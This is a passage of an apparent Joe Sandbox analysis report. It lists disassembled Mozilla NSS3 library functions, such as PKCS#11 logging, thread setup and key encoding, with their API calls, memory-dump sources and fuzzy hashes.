                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_Digest), ref: 6C726D86
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C726DB4
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C726DC3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C726DD9
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C726DFA
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C726E13
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C726E2C
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C726E47
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C726EB9
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-2270781106
                                                                                                                                                                                                                                                                                          • Opcode ID: ef19674bd142edcfab04472f94d9c82533a688c586f97f796b7db28fb6d9393f
                                                                                                                                                                                                                                                                                          • Instruction ID: c54e511d577ce9144b5f39e1dbd781487c95cf71de1a33ff26a1ae084fd724ce
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef19674bd142edcfab04472f94d9c82533a688c586f97f796b7db28fb6d9393f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F641D775A01045AFDB209F64DF4DE9A3BB5AB4231DF444436E80897B12DB38A918CBD2
                                                                                                                                                                                                                                                                                          Function 6C729C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_LoginUser), ref: 6C729C66
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C729C94
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C729CA3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C729CB9
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C729CDA
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C729CF5
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C729D10
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C729D29
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C729D42
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-3838449515
                                                                                                                                                                                                                                                                                          • Opcode ID: a2cb91d092b4b0aaa8780a931c1ce83f78d39a6e3bb2187d7d5581517b2e3696
                                                                                                                                                                                                                                                                                          • Instruction ID: 69b1734cf93ef66146c2397bc32911c8082b0163cb665bd3eabc56728b95d753
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2cb91d092b4b0aaa8780a931c1ce83f78d39a6e3bb2187d7d5581517b2e3696
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D341E371601144AFDB20DF54DF4DE9A7BB6AB5230EF884435E80867B12DB3CA858EBD1
                                                                                                                                                                                                                                                                                          Function 6C6E1FE0 Relevance: 28.8, APIs: 19, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C6E2007
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000084), ref: 6C6E2077
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000002C), ref: 6C6E20DF
                                                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 6C6E2188
                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3 ref: 6C6E21B7
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000084), ref: 6C6E221C
                                                                                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C6E22C2
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C6E22CD
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6E22DD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0F00: PR_GetPageSize.NSS3(6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000,?,6C67204A), ref: 6C6E0F1B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0F00: PR_NewLogModule.NSS3(clock,6C6E0936,FFFFE8AE,?,6C6716B7,00000000,?,6C6E0936,00000000,?,6C67204A), ref: 6C6E0F25
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3559583721-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 422782fe43b2e20acf630911d52eec972b0bba2a44fe60c20f2b960dc36cfcf8
                                                                                                                                                                                                                                                                                          • Instruction ID: 79e8552dbd1ab4abc8102c6dfcb3dd24542ca46b2fdacffb66ed51199bdecacd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 422782fe43b2e20acf630911d52eec972b0bba2a44fe60c20f2b960dc36cfcf8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B9180706063028FDBB0EF3888097577BF5BB0A70CF40453AE549D6A81EBB49508CF95
                                                                                                                                                                                                                                                                                          Function 6C809C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000080), ref: 6C809C70
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C809C85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: calloc.MOZGLUE(00000001,00000084,6C6E0936,00000001,?,6C6E102C), ref: 6C7B98E5
                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C809C96
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6E21BC), ref: 6C6DBB8C
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C809CA9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C7B9946
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6716B7,00000000), ref: 6C7B994E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: free.MOZGLUE(00000000), ref: 6C7B995E
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C809CB9
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C809CC9
                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C809CDA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6DBBEB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C6DBBFB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: GetLastError.KERNEL32 ref: 6C6DBC03
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C6DBC19
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DBB80: free.MOZGLUE(00000000), ref: 6C6DBC22
                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(?), ref: 6C809CF0
                                                                                                                                                                                                                                                                                          • PR_NewPollableEvent.NSS3 ref: 6C809D03
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7FF3B0: PR_CallOnce.NSS3(6C8514B0,6C7FF510), ref: 6C7FF3E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7FF3B0: PR_CreateIOLayerStub.NSS3(6C85006C), ref: 6C7FF402
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7FF3B0: PR_Malloc.NSS3(00000004), ref: 6C7FF416
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7FF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C7FF42D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7FF3B0: PR_SetSocketOption.NSS3(?), ref: 6C7FF455
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7FF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C7FF473
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9890: TlsGetValue.KERNEL32(?,?,?,6C7B97EB), ref: 6C7B989E
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C809D78
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C809DAF
                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C809EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C809D9F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DB3C0: TlsGetValue.KERNEL32 ref: 6C6DB403
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C6DB459
                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C80A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C809DE8
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C809DFC
                                                                                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C80A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C809E29
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C809E3D
                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C809E71
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C809E89
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4254102231-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 68eb0e19b3dd897be3de1db7445c55f52662684cd056c3b2c3b5c21b8aed518d
                                                                                                                                                                                                                                                                                          • Instruction ID: 5618ca0d9bf10dc98dc64b02731ff48b902e4e0d281b274c728c12b6126c9e01
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68eb0e19b3dd897be3de1db7445c55f52662684cd056c3b2c3b5c21b8aed518d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52611BB1A00706AFD720DF75DD44A66BBF8FF49208B044939E859D7B11EB70E814CBA5
                                                                                                                                                                                                                                                                                          Function 6C703FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECKEY_CopyPublicKey.NSS3(?), ref: 6C704014
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7039F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C705E6F,?), ref: 6C703A08
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7039F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C705E6F), ref: 6C703A1C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7039F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C703A3C
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C704038
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C70404D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C81A0F4), ref: 6C7040C2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C74F0C8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C74F122
                                                                                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C70409A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C6FE708,00000000,00000000,00000004,00000000), ref: 6C74BE6A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7004DC,?), ref: 6C74BE7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C74BEC2
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7040DE
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7040F4
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C704108
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C70411A
                                                                                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C704137
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C704150
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C81A1C8), ref: 6C70417E
                                                                                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C704194
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7041A7
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7041B2
                                                                                                                                                                                                                                                                                          • PK11_DestroyObject.NSS3(?,?), ref: 6C7041D9
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7041FC
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C81A1A8), ref: 6C70422D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 912348568-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ada0112bc3de6d00ab2f3386f088bcacd8547f3990c5b2c2c0b4b23ad735c294
                                                                                                                                                                                                                                                                                          • Instruction ID: a7ebace09185e4a7dc2acd1ebcb369fb2ee91d9227fd1ee5de4e2d72f2337ed8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ada0112bc3de6d00ab2f3386f088bcacd8547f3990c5b2c2c0b4b23ad735c294
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0251F5F1B003006BF7109B259E49B6776DC9F6428CF448528ED5AC6B93FB31E518A3A2
                                                                                                                                                                                                                                                                                          Function 6C748E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C748E01,00000000,6C749060,6C850B64), ref: 6C748E7B
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C748E01,00000000,6C749060,6C850B64), ref: 6C748E9E
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(6C850B64,00000001,?,?,?,?,6C748E01,00000000,6C749060,6C850B64), ref: 6C748EAD
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C748E01,00000000,6C749060,6C850B64), ref: 6C748EC3
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C748E01,00000000,6C749060,6C850B64), ref: 6C748ED8
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C748E01,00000000,6C749060,6C850B64), ref: 6C748EE5
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C748E01), ref: 6C748EFB
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C850B64,6C850B64), ref: 6C748F11
                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C748F3F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C74A421,00000000,00000000,6C749826), ref: 6C74A136
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74904A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C748E76
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                                                                                                                          • API String ID: 977052965-1032500510
                                                                                                                                                                                                                                                                                          • Opcode ID: 54c02b99f0844e7f5a2569877991bf6ee79dd00100549cc84645f5ddbe44c2c2
                                                                                                                                                                                                                                                                                          • Instruction ID: 1abc24b8b09d0077c9263983c42ea904fc642c0d8e83e573a55053d003d33a3a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54c02b99f0844e7f5a2569877991bf6ee79dd00100549cc84645f5ddbe44c2c2
